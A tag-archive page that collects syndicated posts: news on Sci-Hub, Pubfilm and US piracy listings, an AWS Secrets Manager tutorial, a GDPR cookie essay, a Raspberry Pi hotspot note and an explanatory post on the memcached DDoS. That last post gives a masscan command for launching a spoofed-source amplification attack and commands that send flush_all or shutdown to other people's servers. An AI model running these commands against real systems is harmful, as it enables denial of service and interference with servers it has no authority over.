Tag Archives: SNI

Notes on setting up Raspberry Pi 3 as WiFi hotspot

Post Syndicated from Robert Graham original https://blog.erratasec.com/2018/04/notes-on-setting-up-raspberry-pi-3-as.html

I want to sniff the packets for IoT devices. There are a number of ways of doing this, but one straightforward mechanism is configuring a “Raspberry Pi 3 B” as a WiFi hotspot, then running tcpdump on it to record all the packets that pass through it. Google gives lots of results on how to do this, but they all demand that you have the precise hardware, WiFi hardware, and software that the authors do, so that’s a pain.

I got it working using the instructions here. There are a few additional notes, which is why I’m writing this blogpost, so I remember them.
https://www.raspberrypi.org/documentation/configuration/wireless/access-point.md

I’m using the RPi-3-B and not the RPi-3-B+, and the latest version of Raspbian at the time of this writing, “Raspbian Stretch Lite 2018-3-13”.

Some things didn’t work as described. The first is that it couldn’t find the package “hostapd”. That solution was to run “apt-get update” a second time.

The second problem was error message about the NAT not working when trying to set the masquerade rule. That’s because the ‘upgrade’ updates the kernel, making the running system out-of-date with the files on the disk. The solution to that is make sure you reboot after upgrading.

Thus, what you do at the start is:

apt-get update
apt-get upgrade
apt-get update
shutdown -r now

Then it’s just “apt-get install tcpdump” and start capturing on wlan0. This will get the non-monitor-mode Ethernet frames, which is what I want.

Publisher Gets Carte Blanche to Seize New Sci-Hub Domains

Post Syndicated from Ernesto original https://torrentfreak.com/publisher-gets-carte-blanche-to-seize-new-sci-hub-domains-180410/

While Sci-Hub is loved by thousands of researchers and academics around the world, copyright holders are doing everything in their power to wipe if off the web.

Following a $15 million defeat against Elsevier last June, the American Chemical Society (ACS) won a default judgment of $4.8 million in copyright damages a few months later.

The publisher was further granted a broad injunction, requiring various third-party services to stop providing access to the site. This includes domain registries, hosting companies and search engines.

Soon after the order was signed, several of Sci-Hub’s domain names became unreachable as domain registries and Cloudflare complied with the court order. Still, Sci-Hub remained available all this time, with help from several newly registered domain names.

Frustrated by Sci-Hub’s resilience, ACS recently went back to court asking for an amended injunction. The publisher requested the authority to seize any and all Sci-Hub domain names, also those that will be registered in the future.

“Plaintiff has been forced to engage in a game of ‘whac-a-mole’ whereby new ‘sci-hub’ domain names emerge,” ACS informed the court.

“Further complicating matters, some registries, registrars, and Internet service providers have refused to disable newer Sci-Hub domain names that were not specifically identified in the Complaint or the injunction”

Soon after the request was submitted, US District Court Judge Leonie Brinkema agreed to the amended language.

The amended injunction now requires search engines, hosting companies, domain registrars, and other service or software providers, to cease facilitating access to Sci-Hub. This includes, but is not limited to, the following domain names.

‘sci-hub.ac, scihub.biz, sci-hub.bz, sci-hub.cc, sci-hub.cf, sci-hub.cn, sci-hub.ga, sci-hub.gq, scihub.hk, sci-hub.is, sci-hub.la, sci-hub.name, sci-hub.nu, sci-hub.nz, sci-hub.onion, scihub22266oqcxt.onion, sci-hub.tw, and sci-hub.ws.’

From the injunction

The new injunction makes ACS’ enforcement efforts much more effective. It effectively means that third-party services can no longer refuse to comply because a Sci-Hub domain is not listed in the complaint or injunction.

This already appears to have had some effect, as several domain names including sci-hub.la and sci-hub.tv became inaccessible soon after the paperwork was signed. Still, it is unlikely that it will help to shut down the site completely.

Several service providers are not receptive to US Court orders. One example is Iceland’s domain registry ISNIC and indeed, at the time of writing, Sci-Hub.is is still widely available.

Seizing .onion domain names, which are used on the Tor network, may also prove to be a challenge. After all, there is no central registration organization involved.

For now, Sci-Hub founder and operator Alexandra Elbakyan appears determined to keep the site online, whatever it takes. While it may be a hassle for users to find the latest working domain names, the new court order is not the end of the “whac-a-mole” just yet.

A copy of the amended injunction is available here (pdf).

Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN reviews, discounts, offers and coupons.

Rotate Amazon RDS database credentials automatically with AWS Secrets Manager

Post Syndicated from Apurv Awasthi original https://aws.amazon.com/blogs/security/rotate-amazon-rds-database-credentials-automatically-with-aws-secrets-manager/

Recently, we launched AWS Secrets Manager, a service that makes it easier to rotate, manage, and retrieve database credentials, API keys, and other secrets throughout their lifecycle. You can configure Secrets Manager to rotate secrets automatically, which can help you meet your security and compliance needs. Secrets Manager offers built-in integrations for MySQL, PostgreSQL, and Amazon Aurora on Amazon RDS, and can rotate credentials for these databases natively. You can control access to your secrets by using fine-grained AWS Identity and Access Management (IAM) policies. To retrieve secrets, employees replace plaintext secrets with a call to Secrets Manager APIs, eliminating the need to hard-code secrets in source code or update configuration files and redeploy code when secrets are rotated.

In this post, I introduce the key features of Secrets Manager. I then show you how to store a database credential for a MySQL database hosted on Amazon RDS and how your applications can access this secret. Finally, I show you how to configure Secrets Manager to rotate this secret automatically.

Key features of Secrets Manager

These features include the ability to:

  • Rotate secrets safely. You can configure Secrets Manager to rotate secrets automatically without disrupting your applications. Secrets Manager offers built-in integrations for rotating credentials for Amazon RDS databases for MySQL, PostgreSQL, and Amazon Aurora. You can extend Secrets Manager to meet your custom rotation requirements by creating an AWS Lambda function to rotate other types of secrets. For example, you can create an AWS Lambda function to rotate OAuth tokens used in a mobile application. Users and applications retrieve the secret from Secrets Manager, eliminating the need to email secrets to developers or update and redeploy applications after AWS Secrets Manager rotates a secret.
  • Secure and manage secrets centrally. You can store, view, and manage all your secrets. By default, Secrets Manager encrypts these secrets with encryption keys that you own and control. Using fine-grained IAM policies, you can control access to secrets. For example, you can require developers to provide a second factor of authentication when they attempt to retrieve a production database credential. You can also tag secrets to help you discover, organize, and control access to secrets used throughout your organization.
  • Monitor and audit easily. Secrets Manager integrates with AWS logging and monitoring services to enable you to meet your security and compliance requirements. For example, you can audit AWS CloudTrail logs to see when Secrets Manager rotated a secret or configure AWS CloudWatch Events to alert you when an administrator deletes a secret.
  • Pay as you go. Pay for the secrets you store in Secrets Manager and for the use of these secrets; there are no long-term contracts or licensing fees.

Get started with Secrets Manager

Now that you’re familiar with the key features, I’ll show you how to store the credential for a MySQL database hosted on Amazon RDS. To demonstrate how to retrieve and use the secret, I use a python application running on Amazon EC2 that requires this database credential to access the MySQL instance. Finally, I show how to configure Secrets Manager to rotate this database credential automatically. Let’s get started.

Phase 1: Store a secret in Secrets Manager

  1. Open the Secrets Manager console and select Store a new secret.
     
    Secrets Manager console interface
     
  2. I select Credentials for RDS database because I’m storing credentials for a MySQL database hosted on Amazon RDS. For this example, I store the credentials for the database superuser. I start by securing the superuser because it’s the most powerful database credential and has full access over the database.
     
    Store a new secret interface with Credentials for RDS database selected
     

    Note: For this example, you need permissions to store secrets in Secrets Manager. To grant these permissions, you can use the AWSSecretsManagerReadWriteAccess managed policy. Read the AWS Secrets Manager Documentation for more information about the minimum IAM permissions required to store a secret.

  3. Next, I review the encryption setting and choose to use the default encryption settings. Secrets Manager will encrypt this secret using the Secrets Manager DefaultEncryptionKeyDefaultEncryptionKey in this account. Alternatively, I can choose to encrypt using a customer master key (CMK) that I have stored in AWS KMS.
     
    Select the encryption key interface
     
  4. Next, I view the list of Amazon RDS instances in my account and select the database this credential accesses. For this example, I select the DB instance mysql-rds-database, and then I select Next.
     
    Select the RDS database interface
     
  5. In this step, I specify values for Secret Name and Description. For this example, I use Applications/MyApp/MySQL-RDS-Database as the name and enter a description of this secret, and then select Next.
     
    Secret Name and description interface
     
  6. For the next step, I keep the default setting Disable automatic rotation because my secret is used by my application running on Amazon EC2. I’ll enable rotation after I’ve updated my application (see Phase 2 below) to use Secrets Manager APIs to retrieve secrets. I then select Next.

    Note: If you’re storing a secret that you’re not using in your application, select Enable automatic rotation. See our AWS Secrets Manager getting started guide on rotation for details.

     
    Configure automatic rotation interface
     

  7. Review the information on the next screen and, if everything looks correct, select Store. We’ve now successfully stored a secret in Secrets Manager.
  8. Next, I select See sample code.
     
    The See sample code button
     
  9. Take note of the code samples provided. I will use this code to update my application to retrieve the secret using Secrets Manager APIs.
     
    Python sample code
     

Phase 2: Update an application to retrieve secret from Secrets Manager

Now that I have stored the secret in Secrets Manager, I update my application to retrieve the database credential from Secrets Manager instead of hard coding this information in a configuration file or source code. For this example, I show how to configure a python application to retrieve this secret from Secrets Manager.

  1. I connect to my Amazon EC2 instance via Secure Shell (SSH).
  2. Previously, I configured my application to retrieve the database user name and password from the configuration file. Below is the source code for my application.
    import MySQLdb
    import config

    def no_secrets_manager_sample()

    # Get the user name, password, and database connection information from a config file.
    database = config.database
    user_name = config.user_name
    password = config.password

    # Use the user name, password, and database connection information to connect to the database
    db = MySQLdb.connect(database.endpoint, user_name, password, database.db_name, database.port)

  3. I use the sample code from Phase 1 above and update my application to retrieve the user name and password from Secrets Manager. This code sets up the client and retrieves and decrypts the secret Applications/MyApp/MySQL-RDS-Database. I’ve added comments to the code to make the code easier to understand.
    # Use the code snippet provided by Secrets Manager.
    import boto3
    from botocore.exceptions import ClientError

    def get_secret():
    #Define the secret you want to retrieve
    secret_name = "Applications/MyApp/MySQL-RDS-Database"
    #Define the Secrets mManager end-point your code should use.
    endpoint_url = "https://secretsmanager.us-east-1.amazonaws.com"
    region_name = "us-east-1"

    #Setup the client
    session = boto3.session.Session()
    client = session.client(
    service_name='secretsmanager',
    region_name=region_name,
    endpoint_url=endpoint_url
    )

    #Use the client to retrieve the secret
    try:
    get_secret_value_response = client.get_secret_value(
    SecretId=secret_name
    )
    #Error handling to make it easier for your code to tolerate faults
    except ClientError as e:
    if e.response['Error']['Code'] == 'ResourceNotFoundException':
    print("The requested secret " + secret_name + " was not found")
    elif e.response['Error']['Code'] == 'InvalidRequestException':
    print("The request was invalid due to:", e)
    elif e.response['Error']['Code'] == 'InvalidParameterException':
    print("The request had invalid params:", e)
    else:
    # Decrypted secret using the associated KMS CMK
    # Depending on whether the secret was a string or binary, one of these fields will be populated
    if 'SecretString' in get_secret_value_response:
    secret = get_secret_value_response['SecretString']
    else:
    binary_secret_data = get_secret_value_response['SecretBinary']

    # Your code goes here.

  4. Applications require permissions to access Secrets Manager. My application runs on Amazon EC2 and uses an IAM role to obtain access to AWS services. I will attach the following policy to my IAM role. This policy uses the GetSecretValue action to grant my application permissions to read secret from Secrets Manager. This policy also uses the resource element to limit my application to read only the Applications/MyApp/MySQL-RDS-Database secret from Secrets Manager. You can visit the AWS Secrets Manager Documentation to understand the minimum IAM permissions required to retrieve a secret.
    {
    "Version": "2012-10-17",
    "Statement": {
    "Sid": "RetrieveDbCredentialFromSecretsManager",
    "Effect": "Allow",
    "Action": "secretsmanager:GetSecretValue",
    "Resource": "arn:aws:secretsmanager:::secret:Applications/MyApp/MySQL-RDS-Database"
    }
    }

Phase 3: Enable Rotation for Your Secret

Rotating secrets periodically is a security best practice because it reduces the risk of misuse of secrets. Secrets Manager makes it easy to follow this security best practice and offers built-in integrations for rotating credentials for MySQL, PostgreSQL, and Amazon Aurora databases hosted on Amazon RDS. When you enable rotation, Secrets Manager creates a Lambda function and attaches an IAM role to this function to execute rotations on a schedule you define.

Note: Configuring rotation is a privileged action that requires several IAM permissions and you should only grant this access to trusted individuals. To grant these permissions, you can use the AWS IAMFullAccess managed policy.

Next, I show you how to configure Secrets Manager to rotate the secret Applications/MyApp/MySQL-RDS-Database automatically.

  1. From the Secrets Manager console, I go to the list of secrets and choose the secret I created in the first step Applications/MyApp/MySQL-RDS-Database.
     
    List of secrets in the Secrets Manager console
     
  2. I scroll to Rotation configuration, and then select Edit rotation.
     
    Rotation configuration interface
     
  3. To enable rotation, I select Enable automatic rotation. I then choose how frequently I want Secrets Manager to rotate this secret. For this example, I set the rotation interval to 60 days.
     
    Edit rotation configuration interface
     
  4. Next, Secrets Manager requires permissions to rotate this secret on your behalf. Because I’m storing the superuser database credential, Secrets Manager can use this credential to perform rotations. Therefore, I select Use the secret that I provided in step 1, and then select Next.
     
    Select which secret to use in the Edit rotation configuration interface
     
  5. The banner on the next screen confirms that I have successfully configured rotation and the first rotation is in progress, which enables you to verify that rotation is functioning as expected. Secrets Manager will rotate this credential automatically every 60 days.
     
    Confirmation banner message
     

Summary

I introduced AWS Secrets Manager, explained the key benefits, and showed you how to help meet your compliance requirements by configuring AWS Secrets Manager to rotate database credentials automatically on your behalf. Secrets Manager helps you protect access to your applications, services, and IT resources without the upfront investment and on-going maintenance costs of operating your own secrets management infrastructure. To get started, visit the Secrets Manager console. To learn more, visit Secrets Manager documentation.

If you have comments about this post, submit them in the Comments section below. If you have questions about anything in this post, start a new thread on the Secrets Manager forum.

Want more AWS Security news? Follow us on Twitter.

Tracking Cookies and GDPR

Post Syndicated from Bozho original https://techblog.bozho.net/tracking-cookies-gdpr/

GDPR is the new data protection regulation, as you probably already know. I’ve given a detailed practical advice for what it means for developers (and product owners). However, there’s one thing missing there – cookies. The elephant in the room.

Previously I’ve stated that cookies are subject to another piece of legislation – the ePrivacy directive, which is getting updated and its new version will be in force a few years from now. And while that’s technically correct, cookies seem to be affected by GDPR as well. In a way I’ve underestimated that effect.

When you do a Google search on “GDPR cookies”, you’ll pretty quickly realize that a) there’s not too much information and b) there’s not much technical understanding of the issue.

What appears to be the consensus is that GDPR does change the way cookies are handled. More specifically – tracking cookies. Here’s recital 30:

(30) Natural persons may be associated with online identifiers provided by their devices, applications, tools and protocols, such as internet protocol addresses, cookie identifiers or other identifiers such as radio frequency identification tags. This may leave traces which, in particular when combined with unique identifiers and other information received by the servers, may be used to create profiles of the natural persons and identify them.

How tracking cookies work – a 3rd party (usually an ad network) gives you a code snippet that you place on your website, for example to display ads. That code snippet, however, calls “home” (makes a request to the 3rd party domain). If the 3rd party has previously been used on your computer, it has created a cookie. In the example of Facebook, they have the cookie with your Facebook identifier because you’ve logged in to Facebook. So this cookie (with your identifier) is sent with the request. The request also contains all the details from the page. In effect, you are uniquely identified by an identifier (in the case of Facebook and Google – fully identified, rather than some random anonymous identifier as with other ad networks).

Your behaviour on the website is personal data. It gets associated with your identifier, which in turn is associated with your profile. And all of that is personal data. Who is responsible for collecting the website behaviour data, i.e. who is the “controller”? Is it Facebook (or any other 3rd party) that technically does the collection? No, it’s the website owner, as the behaviour data is obtained on their website, and they have put the tracking piece of code there. So they bear responsibility.

What’s the responsibility? So far it boiled down to displaying the useless “we use cookies” warning that nobody cares about. And the current (old) ePrivacy directive and its interpretations says that this is enough – if the users actions can unambiguously mean that they are fine with cookies – i.e. if they continue to use the website after seeing the warning – then you’re fine. This is no longer true from a GDPR perspective – you are collecting user data and you have to have a lawful ground for processing.

For the data collected by tracking cookies you have two options – “consent” and “legitimate interest”. Legitimate interest will be hard to prove – it is not something that a user reasonably expects, it is not necessary for you to provide the service. If your lawyers can get that option to fly, good for them, but I’m not convinced regulators will be happy with that.

The other option is “consent”. You have to ask your users explicitly – that means “with a checkbox” – to let you use tracking cookies. That has two serious implications – from technical and usability point of view.

  • The technical issue is that the data is sent via 3rd party code as soon as the page loads and before the user can give their consent. And that’s already a violation. You can, of course, have the 3rd party code be dynamically inserted only after the user gives consent, but that will require some fiddling with javascript and might not always work depending on the provider. And you’d have to support opt-out at any time (which would in turn disable the 3rd party snippet). It would require actual coding, rather than just copy-pasting a snippet.
  • The usability aspect is the bigger issue – while you could neatly tuck a cookie warning at the bottom, you’d now have to have a serious, “stop the world” popup that asks for consent if you want anyone to click it. You can, of course, just add a checkbox to the existing cookie warning, but don’t expect anyone to click it.

These aspects pose a significant questions: is it worth it to have tracking cookies? Is developing new functionality worth it, is interrupting the user worth it, and is implementing new functionality just so that users never clicks a hidden checkbox worth it? Especially given that Firefox now blocks all tracking cookies and possibly other browsers will follow?

That by itself is an interesting topic – Firefox has basically implemented the most strict form of requirements of the upcoming ePrivacy directive update (that would turn it into an ePrivacy regulation). Other browsers will have to follow, even though Google may not be happy to block their own tracking cookies. I hope other browsers follow Firefox in tracking protection and the issue will be gone automatically.

To me it seems that it will be increasingly not worthy to have tracking cookies on your website. They add regulatory obligations for you and give you very little benefit (yes, you could track engagement from ads, but you can do that in other ways, arguably by less additional code than supporting the cookie consents). And yes, the cookie consent will be “outsourced” to browsers after the ePrivacy regulation is passed, but we can’t be sure at the moment whether there won’t be technical whack-a-mole between browsers and advertisers and whether you wouldn’t still need additional effort to have dynamic consent for tracking cookies. (For example there are reported issues that Firefox used to make Facebook login fail if tracking protection is enabled. Which could be a simple bug, or could become a strategy by big vendors in the future to force browsers into a less strict tracking protection).

Okay, we’ve decided it’s not worth it managing tracking cookies. But do you have a choice as a website owner? Can you stop your ad network from using them? (Remember – you are liable if users’ data is collected by visiting your website). And currently the answer is no – you can’t disable that. You can’t have “just the ads”. This is part of the “deal” – you get money for the ads you place, but you participate in a big “surveillance” network. Users have a way to opt out (e.g. Google AdWords gives them that option). You, as a website owner, don’t.

Facebook has a recommendations page that says “you take care of getting the consent”. But for example the “like button” plugin doesn’t have an option to not send any data to Facebook.

And sometimes you don’t want to serve ads, just track user behaviour and measure conversion. But even if you ask for consent for that and conditionally insert the plugin/snippet, do you actually know what data it sends? And what it’s used for? Because you have to know in order to inform your users. “Do you agree to use tracking cookies that Facebook has inserted in order to collect data about your behaviour on our website” doesn’t sound compelling.

So, what to do? The easiest thing is just not to use any 3rd party ad-related plugins. But that’s obviously not an option, as ad revenue is important, especially in the publishing industry. I don’t have a good answer, apart from “Regulators should pressure ad networks to provide opt-outs and clearly document their data usage”. They have to do that under GDPR, and while website owners are responsible for their users’ data, the ad networks that are in the role of processors in this case (as you delegate the data collection for your visitors to them) also have obligation to assist you in fulfilling your obligations. So ask Facebook – what should I do with your tracking cookies? And when the regulator comes after a privacy-aware customer files a complaint, you could prove that you’ve tried.

The ethical debate whether it’s wrong to collect data about peoples’ behaviour without their informed consent is an easy one. And that’s why I don’t put blame on the regulators – they are putting the ethical consensus in law. It gets more complicated if not allowing tracking means some internet services are no longer profitable and therefore can’t exist. Can we have the cake and eat it too?

The post Tracking Cookies and GDPR appeared first on Bozho's tech blog.

Some notes on memcached DDoS

Post Syndicated from Robert Graham original http://blog.erratasec.com/2018/03/some-notes-on-memcached-ddos.html

I thought I’d write up some notes on the memcached DDoS. Specifically, I describe how many I found scanning the Internet with masscan, and how to use masscan as a killswitch to neuter the worst of the attacks.

Test your servers

I added code to my port scanner for this, then scanned the Internet:
masscan 0.0.0.0/0 -pU:11211 –banners | grep memcached
This example scans the entire Internet (/0). Replaced 0.0.0.0/0 with your address range (or ranges).
This produces output that looks like this:
Banner on port 11211/udp on 172.246.132.226: [memcached] uptime=230130 time=1520485357 version=1.4.13
Banner on port 11211/udp on 89.110.149.218: [memcached] uptime=3935192 time=1520485363 version=1.4.17
Banner on port 11211/udp on 172.246.132.226: [memcached] uptime=230130 time=1520485357 version=1.4.13
Banner on port 11211/udp on 84.200.45.2: [memcached] uptime=399858 time=1520485362 version=1.4.20
Banner on port 11211/udp on 5.1.66.2: [memcached] uptime=29429482 time=1520485363 version=1.4.20
Banner on port 11211/udp on 103.248.253.112: [memcached] uptime=2879363 time=1520485366 version=1.2.6
Banner on port 11211/udp on 193.240.236.171: [memcached] uptime=42083736 time=1520485365 version=1.4.13
The “banners” check filters out those with valid memcached responses, so you don’t get other stuff that isn’t memcached. To filter this output further, use  the ‘cut’ to grab just column 6:
… | cut -d ‘ ‘ -f 6 | cut -d: -f1
You often get multiple responses to just one query, so you’ll want to sort/uniq the list:
… | sort | uniq

My results from an Internet wide scan

I got 15181 results (or roughly 15,000).
People are using Shodan to find a list of memcached servers. They might be getting a lot results back that response to TCP instead of UDP. Only UDP can be used for the attack.

Other researchers scanned the Internet a few days ago and found ~31k. I don’t know if this means people have been removing these from the Internet.

Masscan as exploit script

BTW, you can not only use masscan to find amplifiers, you can also use it to carry out the DDoS. Simply import the list of amplifier IP addresses, then spoof the source address as that of the target. All the responses will go back to the source address.
masscan -iL amplifiers.txt -pU:11211 –spoof-ip –rate 100000
I point this out to show how there’s no magic in exploiting this. Numerous exploit scripts have been released, because it’s so easy.

Why memcached servers are vulnerable

Like many servers, memcached listens to local IP address 127.0.0.1 for local administration. By listening only on the local IP address, remote people cannot talk to the server.
However, this process is often buggy, and you end up listening on either 0.0.0.0 (all interfaces) or on one of the external interfaces. There’s a common Linux network stack issue where this keeps happening, like trying to get VMs connected to the network. I forget the exact details, but the point is that lots of servers that intend to listen only on 127.0.0.1 end up listening on external interfaces instead. It’s not a good security barrier.
Thus, there are lots of memcached servers listening on their control port (11211) on external interfaces.

How the protocol works

The protocol is documented here. It’s pretty straightforward.
The easiest amplification attacks is to send the “stats” command. This is 15 byte UDP packet that causes the server to send back either a large response full of useful statistics about the server.  You often see around 10 kilobytes of response across several packets.
A harder, but more effect attack uses a two step process. You first use the “add” or “set” commands to put chunks of data into the server, then send a “get” command to retrieve it. You can easily put 100-megabytes of data into the server this way, and causes a retrieval with a single “get” command.
That’s why this has been the largest amplification ever, because a single 100-byte packet can in theory cause a 100-megabytes response.
Doing the math, the 1.3 terabit/second DDoS divided across the 15,000 servers I found vulnerable on the Internet leads to an average of 100-megabits/second per server. This is fairly minor, and is indeed something even small servers (like Raspberry Pis) can generate.

Neutering the attack (“kill switch”)

If they are using the more powerful attack against you, you can neuter it: you can send a “flush_all” command back at the servers who are flooding you, causing them to drop all those large chunks of data from the cache.
I’m going to describe how I would do this.
First, get a list of attackers, meaning, the amplifiers that are flooding you. The way to do this is grab a packet sniffer and capture all packets with a source port of 11211. Here is an example using tcpdump.
tcpdump -i -w attackers.pcap src port 11221
Let that run for a while, then hit [ctrl-c] to stop, then extract the list of IP addresses in the capture file. The way I do this is with tshark (comes with Wireshark):
tshark -r attackers.pcap -Tfields -eip.src | sort | uniq > amplifiers.txt
Now, craft a flush_all payload. There are many ways of doing this. For example, if you are using nmap or masscan, you can add the bytes to the nmap-payloads.txt file. Also, masscan can read this directly from a packet capture file. To do this, first craft a packet, such as with the following command line foo:
echo -en “\x00\x00\x00\x00\x00\x01\x00\x00flush_all\r\n” | nc -q1 -u 11211
Capture this packet using tcpdump or something, and save into a file “flush_all.pcap”. If you want to skip this step, I’ve already done this for you, go grab the file from GitHub:
Now that we have our list of attackers (amplifiers.txt) and a payload to blast at them (flush_all.pcap), use masscan to send it:
masscan -iL amplifiers.txt -pU:112211 –pcap-payload flush_all.pcap

Reportedly, “shutdown” may also work to completely shutdown the amplifiers. I’ll leave that as an exercise for the reader, since of course you’ll be adversely affecting the servers.

Some notes

Here are some good reading on this attack:

USBPcap – USB Packet Capture For Windows

Post Syndicated from Darknet original https://www.darknet.org.uk/2018/01/usbpcap-usb-packet-capture-windows/?utm_source=rss&utm_medium=social&utm_campaign=darknetfeed

USBPcap – USB Packet Capture For Windows

USBPcap is an open-source USB Packet Capture tool for Windows that can be used together with Wireshark in order to analyse USB traffic without using a Virtual Machine.

Currently, the live capture can be done on “standard input” capture basis: you write a magic command in cmd.exe and you get the Wireshark to capture raw USB traffic on Windows.

USBPcapDriver has three “hats”:

  • Root Hub (USBPCAP_MAGIC_ROOTHUB)
  • Control (USBPCAP_MAGIC_CONTROL)
  • Device (USBPCAP_MAGIC_DEVICE)

What you won’t see using USBPcap

As USBPcap captures URBs passed between functional device object (FDO) and physical device object (PDO) there are some USB communications elements that you will notice only in hardware USB sniffer.

Read the rest of USBPcap – USB Packet Capture For Windows now! Only available at Darknet.

MPAA Wins $19.8 Million From Pirate Site Pubfilm

Post Syndicated from Ernesto original https://torrentfreak.com/mpaa-wins-19-8-million-from-pirate-site-pubfilm-180119/

In recent years the MPAA has pursued legal action against several pirate sites and the streaming service Pubfilm is one of their latest targets.

Hollywood’s industry group initially kept the lawsuit secret. This was done to prevent Pubfilm’s operator from moving to a new domain preemptively. While this strategy worked, Pubfilm didn’t throw in the towel.

Soon after the pubfilm.com domain name was suspended, the site moved to pubfilm.ac. And that wasn’t all. Pubfilm also started to actively advertise its new domain through Google Adsense to regain its lost traffic.

Today, close to a year has passed and Pubfilm is still around. The site moved from domain to domain and currently resides at Pubfilm.is and a few other domains that are advertised on the site.

All this time the company failed to responded in court, so the case saw little movement. This week, however, the MPAA made its demands clear and soon after the court issued a default against the site and its unknown operators.

“Defendants are Internet pirates who own, operate, and promote a ring of interconnected websites under the name “PubFilm” and variants thereof whose purpose is to profit from the infringement of copyrighted works,” the group wrote in its request.

Because of this continued infringement, the MPAA demanded the maximum amount of statutory copyright infringement damages. With 132 titles listed in the complaint, this totals nearly $20 million.

“Given the egregious circumstances of this case, Plaintiffs should be awarded the full amount of statutory damages of $150,000 for each of the 132 Works identified in the Complaint, for a total of $19,800,000,” the MPAA writes in its memorandum.

In addition, the Hollywood studios requested a permanent injunction that will require domain registries to put associated domain names on hold and sign them over to the MPAA.

Both requests were granted by the court on Thursday.

Pubfilm domain hopping

Previously, several domain names were aready seized through a preliminary injunction that resulted in Pubfilm moving from domain to domain in recent months. While these seizures can be effective, not all domain registries will comply with a US court order.

One of Pubfilm’s main domain names at the moment uses the Icelandic .is cTLD. In the past, Iceland’s domain registry ISNIC told TorrentFreak that it would only take action when an Icelandic Court tells it to.

This means that the MPAA’s win might be one without teeth.

Getting millions of dollars from an anonymous site operator, presumably outside the United States, is not easy. And since the site still has several hard-to-shutdown domains, taking it offline isn’t that straightforward either.

The streaming site operators didn’t appear to be impressed by the legal battle either. For the time being, they seem more concerned with fighting fake versions, judging from their most recent Facebook update.

Pubfilm’s latest Facebook post

A copy of the MPAA’s Memorandum in support of the default judgment and permanent injunction is available here (pdf). A copy of court’s order can be found here (pdf).

Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN discounts, offers and coupons

US Govt Brands Torrent, Streaming & Cyberlocker Sites As Notorious Markets

Post Syndicated from Andy original https://torrentfreak.com/us-govt-brands-torrent-streaming-cyberlocker-sites-as-notorious-markets-180115/

In its annual “Out-of-Cycle Review of Notorious Markets” the office of the United States Trade Representative (USTR) has listed a long list of websites said to be involved in online piracy.

The list is compiled with high-level input from various trade groups, including the MPAA and RIAA who both submitted their recommendations (1,2) during early October last year.

With the word “allegedly” used more than two dozen times in the report, the US government notes that its report does not constitute cast-iron proof of illegal activity. However, it urges the countries from where the so-called “notorious markets” operate to take action where they can, while putting owners and facilitators on notice that their activities are under the spotlight.

“A goal of the List is to motivate appropriate action by owners, operators, and service providers in the private sector of these and similar markets, as well as governments, to reduce piracy and counterfeiting,” the report reads.

“USTR highlights the following marketplaces because they exemplify global counterfeiting and piracy concerns and because the scale of infringing activity in these marketplaces can cause significant harm to U.S. intellectual property (IP) owners, consumers, legitimate online platforms, and the economy.”

The report begins with a page titled “Issue Focus: Illicit Streaming Devices”. Unsurprisingly, particularly given their place in dozens of headlines last year, the segment focus on the set-top box phenomenon. The piece doesn’t list any apps or software tools as such but highlights the general position, claiming a cost to the US entertainment industry of $4-5 billion a year.

Torrent Sites

In common with previous years, the USTR goes on to list several of the world’s top torrent sites but due to changes in circumstances, others have been delisted. ExtraTorrent, which shut down May 2017, is one such example.

As the world’s most famous torrent site, The Pirate Bay gets a prominent mention, with the USTR noting that the site is of “symbolic importance as one of the longest-running and most vocal torrent sites. The USTR underlines the site’s resilience by noting its hydra-like form while revealing an apparent secret concerning its hosting arrangements.

“The Pirate Bay has allegedly had more than a dozen domains hosted in various countries around the world, applies a reverse proxy service, and uses a hosting provider in Vietnam to evade further enforcement action,” the USTR notes.

Other torrent sites singled out for criticism include RARBG, which was nominated for the listing by the movie industry. According to the USTR, the site is hosted in Bosnia and Herzegovina and has changed hosting services to prevent shutdowns in recent years.

1337x.to and the meta-search engine Torrentz2 are also given a prime mention, with the USTR noting that they are “two of the most popular torrent sites that allegedly infringe U.S. content industry’s copyrights.” Russia’s RuTracker is also targeted for criticism, with the government noting that it’s now one of the most popular torrent sites in the world.

Streaming & Cyberlockers

While torrent sites are still important, the USTR reserves considerable space in its report for streaming portals and cyberlocker-type services.

4Shared.com, a file-hosting site that has been targeted by dozens of millions of copyright notices, is reportedly no longer able to use major US payment providers. Nevertheless, the British Virgin Islands company still collects significant sums from premium accounts, advertising, and offshore payment processors, USTR notes.

Cyberlocker Rapidgator gets another prominent mention in 2017, with the USTR noting that the Russian-hosted platform generates millions of dollars every year through premium memberships while employing rewards and affiliate schemes.

Due to its increasing popularity as a hosting and streaming operation, Openload.co (Romania) is now a big target for the USTR. “The site is used frequently in combination with add-ons in illicit streaming devices. In November 2017, users visited Openload.co a staggering 270 million times,” the USTR writes.

Owned by a Swiss company and hosted in the Netherlands, the popular site Uploaded is also criticized by the US alongside France’s 1Fichier.com, which allegedly hosts pirate games while being largely unresponsive to takedown notices. Dopefile.pk, a Pakistan-based storage outfit, is also highlighted.

On the video streaming front, it’s perhaps no surprise that the USTR focuses on sites like FMovies (Sweden), GoStream (Vietnam), Movie4K.tv (Russia) and PrimeWire. An organization collectively known as the MovShare group which encompasses Nowvideo.sx, WholeCloud.net, NowDownload.cd, MeWatchSeries.to and WatchSeries.ac, among others, is also listed.

Unauthorized music / research papers

While most of the above are either focused on video or feature it as part of their repertoire, other sites are listed for their attention to music. Convert2MP3.net is named as one of the most popular stream-ripping sites in the world and is highlighted due to the prevalence of YouTube-downloader sites and the 2017 demise of YouTube-MP3.

“Convert2MP3.net does not appear to have permission from YouTube or other sites and does not have permission from right holders for a wide variety of music represented by major U.S. labels,” the USTR notes.

Given the amount of attention the site has received in 2017 as ‘The Pirate Bay of Research’, Libgen.io and Sci-Hub.io (not to mention the endless proxy and mirror sites that facilitate access) are given a detailed mention in this year’s report.

“Together these sites make it possible to download — all without permission and without remunerating authors, publishers or researchers — millions of copyrighted books by commercial publishers and university presses; scientific, technical and medical journal articles; and publications of technological standards,” the USTR writes.

Service providers

But it’s not only sites that are being put under pressure. Following a growing list of nominations in previous years, Swiss service provider Private Layer is again singled out as a rogue player in the market for hosting 1337x.to and Torrentz2.eu, among others.

“While the exact configuration of websites changes from year to year, this is the fourth consecutive year that the List has stressed the significant international trade impact of Private Layer’s hosting services and the allegedly infringing sites it hosts,” the USTR notes.

“Other listed and nominated sites may also be hosted by Private Layer but are using
reverse proxy services to obfuscate the true host from the public and from law enforcement.”

